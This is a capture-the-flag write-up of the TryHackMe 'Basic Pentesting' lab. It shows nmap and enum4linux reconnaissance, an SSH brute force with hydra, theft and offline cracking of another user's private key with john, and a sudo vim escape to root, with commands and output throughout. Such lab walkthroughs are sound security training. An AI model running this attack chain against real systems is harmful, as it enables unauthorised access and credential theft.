TryHackMe · Medium

Basic Pentesting

Platform: TryHackMe

Difficulty: Medium

Category: Linux, Web, PrivEsc

Author: unicorn

Room focused on fundamental penetration testing skills: service enumeration, SMB analysis, brute-forcing SSH credentials, and Linux privilege escalation via weak file permissions. Good introduction to a real pentesting workflow.

nmap enum4linux hydra ssh find john

1. Reconnaissance

Port Scan with Nmap

Start with a full port scan to discover all open services on the target.

$ nmap -sV -sC -p- --min-rate 5000 10.10.x.x

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18
139/tcp open netbios-ssn Samba smbd 3.X - 4.X
445/tcp open netbios-ssn Samba smbd 4.3.11
8009/tcp open ajp13 Apache Jserv
8080/tcp open http Apache Tomcat 9.0.0.M1

Found: SSH, HTTP (Apache + Tomcat), SMB (Samba 4.3.11)

SMB Enumeration

Enumerate SMB shares and users with enum4linux to find potential attack vectors.

$ enum4linux -a 10.10.x.x

[+] Getting domain info...
Domain Name: WORKGROUP

[+] Enumerating users...
user:[kay] rid:[0x3e8]
user:[jan] rid:[0x3e9]

[+] Share Enumeration...
Sharename: Anonymous Access: READ

Discovered users: kay and jan — targets for brute force

2. Exploitation — SSH Brute Force

Brute Force SSH with Hydra

Use discovered usernames and rockyou.txt wordlist to brute-force SSH login.

$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.x.x -t 4

[DATA] attacking ssh://10.10.x.x:22/
[22][ssh] host: 10.10.x.x login: jan password: armando
1 of 1 target successfully completed

Connect via SSH with found credentials:

$ ssh jan@10.10.x.x
jan@10.10.x.x's password: armando

jan@basic-pentesting:~$ # shell obtained

3. Privilege Escalation

Find SSH Key for User Kay

After getting shell as jan, look for privilege escalation paths to the second user and then root.

jan@basic-pentesting:~$ ls /home/
jan kay

jan@basic-pentesting:~$ ls /home/kay/.ssh/
id_rsa id_rsa.pub authorized_keys

jan@basic-pentesting:~$ cat /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,...
... [encrypted key] ...

Found encrypted RSA private key — crack it with John the Ripper

Crack SSH Key Password with John

$ ssh2john id_rsa > id_rsa.hash
$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

beeswax (id_rsa)
1g 0:00:00:03 DONE

$ ssh -i id_rsa kay@10.10.x.x # passphrase: beeswax
kay@basic-pentesting:~$

Root via Sudo Rights

kay@basic-pentesting:~$ sudo -l
User kay may run the following commands:
(ALL) NOPASSWD: /usr/bin/vim

kay@basic-pentesting:~$ sudo vim -c ':!/bin/bash'
root@basic-pentesting:~#

vim with sudo + GTFOBins → root shell

Flags

user.txt

THM{[obtained after SSH as kay]}

root.txt

THM{[obtained after root via vim sudo]}

Key Takeaways

Always enumerate SMB — usernames found there enabled the whole attack chain

Weak SSH passwords are still common — hydra + rockyou is effective

Encrypted SSH private keys can be cracked offline with John the Ripper

sudo misconfiguration (vim, less, python) = instant root via GTFOBins